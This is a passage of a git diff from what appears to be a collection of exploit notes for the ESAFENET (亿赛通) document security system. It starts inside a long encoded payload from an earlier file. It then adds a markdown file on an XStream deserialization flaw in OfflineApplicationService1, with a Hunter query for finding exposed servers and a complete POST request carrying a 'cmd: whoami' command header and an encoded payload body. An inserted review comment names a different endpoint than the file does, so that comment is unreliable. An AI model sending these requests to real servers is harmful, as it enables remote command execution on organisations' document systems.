JCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLG
LLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBL
PNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHB
FOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBI
LCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606393838-c5eba968-6491-4e25-882f-daeb8e717359.png](./img/pAmvocl6LiMwYXO4/1706606393838-c5eba968-6491-4e25-882f-daeb8e717359-967129.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xzm0hwy8gkg8e5nl> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..985f2b5 
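Review bot: the reproduction block in this hunk gives the request but not the expected result, so a reader cannot tell a vulnerable host from a patched one: the `cmd: whoami` header implies the command output comes back somewhere, but the text never says whether it appears in the response body, in a response header, or only in the screenshot, nor what a non-vulnerable server answers. Add one sentence after the request stating where the `whoami` output is observed and what status code to expect. The body is also opaque as shown (a long A-to-P encoded string with no explanation of how it was produced from the XStream XML), so the command cannot be changed or the payload regenerated; document the encoding step or link to the generator. Section 二 lists only the product name with no version range; give the versions tested or state that the affected range is unknown. Finally, `Host: 192.168.110.187:8090` is a private lab address and should be marked as a placeholder, and the request as written (POST to `/CDGServer3/ODMSubmitApplyService` with `Content-Type: text/xml` and a custom `cmd` request header) is the indicator a defender would want called out explicitly.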
--- /dev/null +++ b/亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统OfflineApplicationService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/GjCIUT029FqNfeNV/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-452307.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/OfflineApplicationService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMB
FEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMO
AJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDF